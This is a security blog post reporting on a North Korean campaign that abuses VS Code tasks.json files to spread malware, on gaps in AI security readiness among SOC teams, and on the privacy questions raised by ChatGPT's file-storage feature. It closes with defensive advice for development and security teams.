North Korean Hackers Target Developers While AI Security Gaps Widen
North Korean Hackers Target Developers While AI Security Gaps Widen
As someone who’s spent the last decade watching threat actors adapt their tactics, I have to admit the latest campaign from North Korean hackers caught my attention. They’re now weaponizing something most of us use daily: Visual Studio Code’s task automation features.
Developers in the Crosshairs
The group behind the “Contagious Interview” campaign (also tracked as WaterPlum) has been busy since December, distributing their StoatWaffle malware through malicious VS Code projects. What makes this particularly clever is their abuse of VS Code’s tasks.json files – those handy automation scripts that developers rely on to streamline their workflows.
Think about it from an attacker’s perspective: developers are high-value targets with access to source code, development environments, and often production systems. By disguising malware delivery within legitimate development tools, these threat actors are essentially hiding in plain sight. When a developer opens what appears to be a normal project, the malicious task runs automatically in the background.
This isn’t just another phishing campaign – it’s a sophisticated supply chain attack that targets the very tools we trust. If you’re managing security for development teams, now’s a good time to review what VS Code extensions and project templates your developers are using.
AI Security: The Blind Spot We Can’t Ignore
Speaking of gaps in our defenses, a recent ISACA survey revealed something that honestly doesn’t surprise me but should concern all of us: most cybersecurity staff don’t know how quickly they could contain an attack on AI systems. The confusion isn’t just about technical capabilities – it’s about basic responsibility and understanding.
This ties directly into what we’re seeing from SOC teams experimenting with AI integration. Two cybersecurity leaders recently shared their six-month experience running AI tools in their Security Operations Centers, and the results were mixed at best. While AI can certainly help with alert triage and pattern recognition, it also introduces new failure modes that many teams aren’t prepared for.
The problem isn’t that AI is inherently insecure – it’s that we’re deploying it faster than we’re developing the expertise to secure it properly. When your SOC analysts can’t tell you how long it would take to isolate a compromised AI system, you have a fundamental gap in your incident response planning.
The Privacy Trade-off in AI Tools
Adding another layer to this AI security discussion is OpenAI’s rollout of their new ChatGPT Library feature, which lets users store personal files and images in OpenAI’s cloud storage for future reference in chats. From a user experience standpoint, this makes perfect sense. From a security perspective, it raises immediate questions about data classification and handling.
I’ve already started getting questions from clients about whether their employees can use this feature with work-related documents. The answer, for most organizations, should be a clear policy discussion rather than a blanket yes or no. But here’s the thing – if you don’t have that policy discussion proactively, your employees will make the decision for you.
What This Means for Our Teams
These stories connect in ways that matter for how we approach security in 2026. The North Korean VS Code campaign shows us that threat actors are getting more creative about blending into legitimate workflows. The AI security gaps reveal that we’re moving faster than our understanding. And the ChatGPT Library rollout highlights how quickly new features can create policy challenges.
The common thread? We need to get better at security education that goes beyond traditional awareness training. Our developers need to understand that project files from untrusted sources can be weaponized. Our SOC teams need specific training on AI system security. And our entire organizations need clear policies about AI tool usage before the next feature rollout catches us off guard.
None of these are insurmountable challenges, but they do require us to stay ahead of both the technology curve and the threat landscape. That means more cross-functional conversations, more hands-on testing of new tools in controlled environments, and honestly, more comfort with saying “we don’t know yet, but here’s how we’ll figure it out.”